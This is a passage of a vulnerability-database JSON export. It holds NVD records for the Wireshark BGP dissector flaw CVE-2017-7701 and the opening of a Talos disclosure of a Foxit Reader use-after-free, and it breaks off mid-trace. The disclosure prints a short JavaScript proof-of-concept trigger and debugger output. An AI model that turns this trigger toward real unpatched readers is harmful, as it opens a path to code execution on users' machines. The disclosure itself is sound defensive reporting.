"cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-7701"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-835"], "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:49", "references": [{"idList": ["GLSA-201706-12"], "type": "gentoo"}, {"idList": ["WIRESHARK_2_2_6.NASL", "GENTOO_GLSA-201706-12.NASL", "SUSE_SU-2017-1174-1.NASL", "OPENSUSE-2017-503.NASL", "MACOSX_WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL"], "type": "nessus"}, {"idList": ["KLA11020"], "type": "kaspersky"}, {"idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2020-10-03T13:07:49", "rev": 2, "value": 6.7, "vector": "NONE"}}, "extraReferences": [], "hash": "59a929b67b9882eb69b24aa0d50eb83608c6cfefc5f367bf98073a8ebc550060", "hashmap": [{"hash": "a8addda400df227f3f9d504b8bf755ad", "key": "cpe23"}, {"hash": "b5cef30da83f9b368c6b3bb523042642", "key": "cvss3"}, {"hash": "034034f11b463c3726b3a9bb8c0552b6", "key": "title"}, {"hash": "4485efe94be6fb1ff0c624a29ba28fb5", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "f0a3393dc404b0d05dce8b6e917485ed", "key": "cwe"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "1b4916f7c4edf016e474d2a5b365d8b5", "key": "description"}, {"hash": "0000d23751485532e6eaaf6a0ba6dfba", "key": "cpeConfiguration"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f270045201733e8c2dcabcbb38595fcb", "key": "href"}, {"hash": "bcc4c735b1a2a8bf1aa695390c583d95", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "163ed47a37dad47f3193d5f1ec99e988", "key": "affectedSoftware"}, {"hash": "1f0cc7832f07ee78350b613e89af69f8", "key": "modified"}, {"hash": "ad23b248d8f80b5f7ddf0afdf78d0d64", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "7ca9f704c6cd251dc88f5934562611bc", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7701", "id": "CVE-2017-7701", "lastseen": "2020-10-03T13:07:49", "modified": "2019-10-03T00:03:00", "objectVersion": "1.3", "published": "2017-04-12T23:59:00", "references": ["https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "http://www.securitytracker.com/id/1038262", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "http://www.securityfocus.com/bid/97632", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://security.gentoo.org/glsa/201706-12"], "reporter": "cve@mitre.org", "title": "CVE-2017-7701", "type": "cve", "viewCount": 5}, "differentElements": ["extraReferences"], "edition": 4, "lastseen": "2020-10-03T13:07:49"}, {"bulletin": {"affectedSoftware": [{"name": "wireshark wireshark", "operator": "eq", "version": "2.0.3"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.8"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.1"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.3"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.1"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.4"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.0"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.0"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.2"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.2.5"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.2"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.5"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.11"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.7"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.6"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.10"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.9"}, {"name": "wireshark wireshark", "operator": "eq", "version": "2.0.4"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:wireshark:wireshark:2.2.5", "cpe:/a:wireshark:wireshark:2.2.3", "cpe:/a:wireshark:wireshark:2.0.0", "cpe:/a:wireshark:wireshark:2.0.1", "cpe:/a:wireshark:wireshark:2.2.0", "cpe:/a:wireshark:wireshark:2.0.8", "cpe:/a:wireshark:wireshark:2.0.9", "cpe:/a:wireshark:wireshark:2.0.3", "cpe:/a:wireshark:wireshark:2.0.4", "cpe:/a:wireshark:wireshark:2.0.10", "cpe:/a:wireshark:wireshark:2.2.4", "cpe:/a:wireshark:wireshark:2.0.6", "cpe:/a:wireshark:wireshark:2.2.1", "cpe:/a:wireshark:wireshark:2.0.2", "cpe:/a:wireshark:wireshark:2.2.2", "cpe:/a:wireshark:wireshark:2.0.11", "cpe:/a:wireshark:wireshark:2.0.5", "cpe:/a:wireshark:wireshark:2.0.7"], "cpe23": ["cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*"], "cvelist": ["CVE-2017-7701"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-399"], "description": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:17:10", "references": [{"idList": ["GLSA-201706-12"], "type": "gentoo"}, {"idList": ["WIRESHARK_2_2_6.NASL", "GENTOO_GLSA-201706-12.NASL", "SUSE_SU-2017-1174-1.NASL", "OPENSUSE-2017-503.NASL", "MACOSX_WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL"], "type": "nessus"}, {"idList": ["KLA11020"], "type": "kaspersky"}, {"idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"], "type": "openvas"}]}, "score": {"modified": "2019-05-29T18:17:10", "value": 6.7, "vector": "NONE"}}, "hash": "fb49e1ec19c5cb44e9a9cee4b02baf1dd871c9c1e41d75a313b1f6cfe9633b41", "hashmap": [{"hash": "a8addda400df227f3f9d504b8bf755ad", "key": "cpe23"}, {"hash": "a35a8c59f4a8900d97c63f2f2ccdb465", "key": "modified"}, {"hash": "b5cef30da83f9b368c6b3bb523042642", "key": "cvss3"}, {"hash": "034034f11b463c3726b3a9bb8c0552b6", "key": "title"}, {"hash": "4485efe94be6fb1ff0c624a29ba28fb5", "key": "cpe"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "1b4916f7c4edf016e474d2a5b365d8b5", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1c0be0631b7bf4c3a8c83298e68c99eb", "key": "cwe"}, {"hash": "f270045201733e8c2dcabcbb38595fcb", "key": "href"}, {"hash": "bcc4c735b1a2a8bf1aa695390c583d95", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a4ca8293315ef736211af4f45a7559e6", "key": "affectedSoftware"}, {"hash": "ad23b248d8f80b5f7ddf0afdf78d0d64", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "7ca9f704c6cd251dc88f5934562611bc", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7701", "id": "CVE-2017-7701", "lastseen": "2019-05-29T18:17:10", "modified": "2017-07-11T01:33:00", "objectVersion": "1.3", "published": "2017-04-12T23:59:00", "references": ["https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "http://www.securitytracker.com/id/1038262", "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "http://www.securityfocus.com/bid/97632", "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "https://security.gentoo.org/glsa/201706-12"], "reporter": "cve@mitre.org", "title": "CVE-2017-7701", "type": "cve", "viewCount": 0}, "differentElements": ["modified", "cwe"], "edition": 1, "lastseen": "2019-05-29T18:17:10"}], "edition": 6, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "163ed47a37dad47f3193d5f1ec99e988"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "4485efe94be6fb1ff0c624a29ba28fb5"}, {"key": "cpe23", "hash": "a8addda400df227f3f9d504b8bf755ad"}, {"key": "cpeConfiguration", "hash": "268685a21db2d6bcdb39b892b62ab92b"}, {"key": "cvelist", "hash": "ad23b248d8f80b5f7ddf0afdf78d0d64"}, {"key": "cvss", "hash": "5a4bd22c495ccbe3aa9b54cab81d2473"}, {"key": "cvss2", "hash": "b34e5c25d82480fc6f4979a59fe0e9ff"}, {"key": "cvss3", "hash": "b5cef30da83f9b368c6b3bb523042642"}, {"key": "cwe", "hash": "f0a3393dc404b0d05dce8b6e917485ed"}, {"key": "description", "hash": "1b4916f7c4edf016e474d2a5b365d8b5"}, {"key": "extraReferences", "hash": "320c841dc67e16a6e2e32b483bde222c"}, {"key": "href", "hash": "f270045201733e8c2dcabcbb38595fcb"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "1f0cc7832f07ee78350b613e89af69f8"}, {"key": "published", "hash": "bcc4c735b1a2a8bf1aa695390c583d95"}, {"key": "references", "hash": "7ca9f704c6cd251dc88f5934562611bc"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "034034f11b463c3726b3a9bb8c0552b6"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "59461ec75ba71e2b69f8c4216842509cad4a1735082f7e1e8bd4004c7ba21a0a", "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2017-7701"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7701"]}, {"type": "kaspersky", "idList": ["KLA11020"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201706-12.NASL", "WIRESHARK_2_2_6.NASL", "SUSE_SU-2017-1442-1.NASL", "OPENSUSE-2017-503.NASL", "SUSE_SU-2017-1174-1.NASL", "MACOSX_WIRESHARK_2_2_6.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201706-12"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811001", "OPENVAS:1361412562310811002"]}], "modified": "2021-04-23T00:08:04", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-04-23T00:08:04", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:wireshark:wireshark:2.2.5", "cpe:/a:wireshark:wireshark:2.2.3", "cpe:/a:wireshark:wireshark:2.0.0", "cpe:/a:wireshark:wireshark:2.0.1", "cpe:/a:wireshark:wireshark:2.2.0", "cpe:/a:wireshark:wireshark:2.0.8", "cpe:/a:wireshark:wireshark:2.0.9", "cpe:/a:wireshark:wireshark:2.0.3", "cpe:/a:wireshark:wireshark:2.0.4", "cpe:/a:wireshark:wireshark:2.0.10", "cpe:/a:wireshark:wireshark:2.2.4", "cpe:/a:wireshark:wireshark:2.0.6", "cpe:/a:wireshark:wireshark:2.2.1", "cpe:/a:wireshark:wireshark:2.0.2", "cpe:/a:wireshark:wireshark:2.2.2", "cpe:/a:wireshark:wireshark:2.0.11", "cpe:/a:wireshark:wireshark:2.0.5", "cpe:/a:wireshark:wireshark:2.0.7"], "affectedSoftware": [{"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.7"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.9"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.8"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.3"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.11"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.0"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.6"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.2"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.10"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.4"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.0.1"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.5"}, {"cpeName": "wireshark:wireshark", "name": "wireshark", "operator": "eq", "version": "2.2.4"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*"], "cwe": ["CWE-835"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:wireshark:wireshark:2.0.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557", "refsource": "CONFIRM", "tags": ["Patch", "Issue Tracking"], "url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557"}, {"name": "1038262", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1038262"}, {"name": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory", "Issue Tracking"], "url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a"}, {"name": "https://www.wireshark.org/security/wnpa-sec-2017-16.html", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://www.wireshark.org/security/wnpa-sec-2017-16.html"}, {"name": "GLSA-201706-12", "refsource": "GENTOO", "tags": [], "url": "https://security.gentoo.org/glsa/201706-12"}, {"name": "97632", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/97632"}], "immutableFields": []}], "talos": [{"id": "TALOS-2020-1171", "bulletinFamily": "info", "title": "Foxit Reader JavaScript choice field use-after-free vulnerability", "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1171\n\n## Foxit Reader JavaScript choice field use-after-free vulnerability\n\n##### December 9, 2020\n\n##### CVE Number\n\nCVE-2020-13557\n\n### Summary\n\nA use after free vulnerability exists in the JavaScript engine of Foxit Software\u2019s Foxit PDF Reader, version 10.1.0.37527. A specially crafted PDF document can trigger reuse of previously free memory which can lead to arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.\n\n### Tested Versions\n\nFoxit Reader Version: 10.1.0.37527\n\n### Product URLs\n\n<https://www.foxitsoftware.com/pdf-reader/>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416 - Use After Free\n\n### Details\n\nFoxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe\u2019s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses V8 JavaScript engine.\n\nJavascript support in PDF renderers and editors enables interactive forms which can include different GUI elements such as buttons or text fields. A use after free vulnerability in Foxit Reader can be triggered while executing events that manipulate items of a choice field. Following code demonstrates triggering this vulnerability:\n \n \n function f0() { \n var fl = app.activeDocs[0].getField('choiceField');\n fl.insertItemAt(0,\"b\"); \n fl.setAction(\"Keystroke\",'f1();'); \n fl.deleteItemAt(0);\n \n }\n \n \n function f1() { \n app.activeDocs[0].getField('choiceField').clearItems(); \n }\n \n \n f0();\n \n\nIn the above code, function `f0` first sets up a `choiceField` form element with a single item inserted and attaches a `Keystroke` event to it. Events of type `Keystroke` are triggered either when contents of the field changes (via keystroke or otherwise). Deletion of the element at `0` then triggers the event handler which calls `clearItems`. Calling `clearItems` frees the memory associated with choice field objects while the event handler is still being processed. This can be observed in the debugger:\n \n \n 0:000> bp FoxitReader!safe_vsnprintf+0x13375e\n 0:000> bd 0\n 0:000> g\n ....\n 0:017> be 0\n 0:017> g\n Breakpoint 0 hit\n eax=00000001 ebx=1d09dff8 ecx=0d8879fb edx=00ba0000 esi=1ffd4fd0 edi=00000001\n eip=0259388e esp=00afdd00 ebp=00afdd2c iopl=0 nv up ei pl nz ac po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212\n FoxitReader!safe_vsnprintf+0x13375e:\n 0259388e e8dd9a2d00 call FoxitReader!safe_vsnprintf+0x40d240 (0286d370)\n 0:000> g\n Breakpoint 0 hit\n eax=00000001 ebx=00afde01 ecx=0d88782b edx=00ba0000 esi=1d786fd0 edi=00000002\n eip=0259388e esp=00afdd30 ebp=00afdd48 iopl=0 nv up ei pl nz ac po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212\n FoxitReader!safe_vsnprintf+0x13375e:\n 0259388e e8dd9a2d00 call FoxitReader!safe_vsnprintf+0x40d240 (0286d370)\n 0:000> dd esi\n 1d786fd0 c0c00005 1fcc8fd0 00000000 00000000\n 1d786fe0 c0c0c001 00000000 1d09dff8 00000001\n 1d786ff0 00000001 00000000 00000004 d0d0d0d0\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a esi\n address 1d786fd0 found in\n _DPH_HEAP_ROOT @ ba1000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 11d23958: 1d786fd0 2c - 1d786000 2000\n 68d4abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240\n 7714245b ntdll!RtlDebugAllocateHeap+0x00000039\n 770a6dd9 ntdll!RtlpAllocateHeap+0x000000f9\n 770a5ec9 ntdll!RtlpAllocateHeapInternal+0x00000179\n 770a5d3e ntdll!RtlAllocateHeap+0x0000003e\n 042239fc FoxitReader!FPDFSCRIPT3D_OBJ_BoundingBox__Method_ToString+0x002ebe8c\n 0286d04b FoxitReader!safe_vsnprintf+0x0040cf1b\n 0286d5d6 FoxitReader!safe_vsnprintf+0x0040d4a6\n 0286d1f3 